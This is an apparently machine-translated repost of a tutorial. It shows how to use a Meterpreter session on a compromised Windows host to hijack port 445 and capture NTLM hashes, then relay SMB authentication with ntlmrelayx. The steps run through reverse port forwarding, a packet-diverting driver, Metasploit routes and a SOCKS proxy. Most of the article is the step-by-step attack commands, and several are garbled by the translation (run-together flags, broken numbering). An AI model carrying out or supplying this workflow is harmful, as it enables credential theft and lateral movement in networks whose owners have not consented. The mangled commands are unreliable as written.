Shulou(Shulou.com)06/02 Report--

Today, I will talk to you about how to understand how Meterpreter implements remote NTLM relay attack testing on Windows port 445. many people may not know much about it. In order to make you understand better, the editor has summarized the following for you. I hope you can get something from this article.

Hijacking port 445 to perform trunk attacks or Hash-Capturing attacks is already a common attack. How do you listen to port 445 when you use meterpreter to infect the target device? Just a few weeks ago, the topic surfaced again. But in fact, the existing tools have already solved this problem, but few people know about it.

We will show you how to use these tools to perform relay attacks on the target device. The advantage of this technique is that we don't need to use python2exe or the entire Python stack on the infected host, we just need to use a simple drive and meterpreter to achieve our goal.

Please note that for the convenience of demonstration, we have put all the files on the disk of the target host, and if you do not want to do so in practice, you can use the RAM disk solution or extend the current meterpreter memory execution function to achieve your goal. In addition, you can also use static compilation and other methods to bundle additional DLL files.

Who is the "owner" of port 445?

First, we need to know which service or process on the host is responsible for listening on port 445. In general, when solving this type of problem, I like to search the Internet first, and if someone has already answered these questions, we can manually verify and copy the solution directly on the system. So I directly Google the following:

Msdnprocess listening port 445

I did a series of tests to determine whether the service was responsible for listening on port 445 by enabling and disabling the service, and I found the Server service. But this service will not have an immediate effect on us, because it needs to restart the device to complete our operation, which is obviously not a really feasible solution. Because ideally, we don't want to restart the infected device.

After delving into and looking at the relevant properties of the service, we can find the command to enable the service:

C:\ WINDOWS\ system32\ svchost.exe-k netsvcs-p

If you want to learn more about svchost.exe 's command line arguments, I suggest you visit Geoff Chappell's website: [portal]

If we navigate to the registry keys described above in the article:

HKEY_LOCAL_MACHINE\ Software\ Microsoft\ WindowsNT\ CurrentVersion\ Svchost

We will see a lot of bundled services, but this does not completely solve our problems, so we need to find another way. Here I found an article on EternalBlue vulnerability exploitation, which mentions vulnerability analysis and Windows port 10: the SMB protocol is involved in srv.sys drives and some drives that need to work with it. Finally, in order to get the final confirmation, we also found this article: [portal]

Now that we know that the code responsible for the handler's communication with port 445 is in the kernel, this is definitely bad news for us, because hijacking socket is very difficult. Next, we will show you how to hijack and redirect port 445.

Hijacking and redirection of Port 445

Now that we know that the "master" of port 445 exists in the kernel, we can start designing our attack strategy. First of all, I thought of using Linux's iptables to hijack incoming or outgoing connection data, because what it does belongs to the underlying part of the network stack. To find out whether this approach can be applied to Windows, we need to take a look at the inner workings of the Windows firewall:

1. Windows firewall architecture: [portal]

2. Overview of Windows filter platform: [portal]

Here we need to create a special driver, and you might think that netsh port redirection might be useful, but it's not. Although creating a driver may not sound like the ideal solution, if you search for things like wfp port connections, you will find that the answer @ agsolino has been given. Let's take a look at how to use meterpreter and the above techniques to redirect the connection to the target system port 445. The following figure shows how the entire technology works:

We can see that we have got a host infected with meterpreter. With this meterpreter, we can set up a reverse port forwarding and then receive meterpreter connections on our host through port 4444. Remote listening port 8445 (meterpreter) receives connection data from port 445, hijacking connections from port 445 and forwarding them to metasploit. Next, let's take a look at how to hijack Windows port 445 by hijacking some credentials:

1. Set up an available meterpreter session with administrator privileges

two。 Set up a SMB capture server:

A) use auxiliary/scanner/smb/smb_login

B) set up SRVPORT 9445

C) run-j

3. Set up a meterpreter reverse forwarding port:

Portfwdadd-R-L 127.0.0.1-l 9445-p 8445

4. Set port 445 hijacking:

Divert TCPConn.exe 445 8445

Now, when the target host connects to port 445 of the infected host, you will receive a hash in your metasploit console:

Next, let's take a look at the complete implementation mechanism of a remote NTLM relay attack.

How to implement SMB Relay attack through meterpreter

Now we will use ntlmrelayx in the Ubuntu system, and the trunk device is a system in the target system. This involves forwarding forward and reverse traffic through meterpreter, reverse connection is used to ensure that hosts in the target network can complete the connection with the infected host, ntlmrelayx is needed, and the connection to the target network involves a SOCKS agent. The following figure shows the entire attack flow:

The first step is similar to the previous image, where we will set up our reverse channel:

1. Set up an available meterpreter session with administrator privileges

two。 Set up a meterpreter reverse port forwarding:

Portfwd add-R-p 4445-l 445-L 127.0.0.1

3. Hijack port 445 via meterpreter:

Execute-f divertTCPconn.exe-a '445 4445'

In order to set the forwarding channel, we added a route through the meterpreter session to redirect the traffic and set the SOCKS proxy:

1. To add a route through meterpreter, you need to specify the IP address:

Route add 192.168.222.103/32 3

two。 Set up the SOCKS proxy:

A) use auxiliary/server/socks4a

B) run

C) ensure that the SOCKS port is specified in / etc/proxychains.conf (default 1080)

3. Run ntlmrelayx through SOCK:

Sudo proxychains ntlmrelayx.py-t smb://192.168.222.103-smb2support

The following figure shows the running result:

After reading the above, do you have any further understanding of how to understand Meterpreter's testing of remote NTLM relay attacks on Windows port 445? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.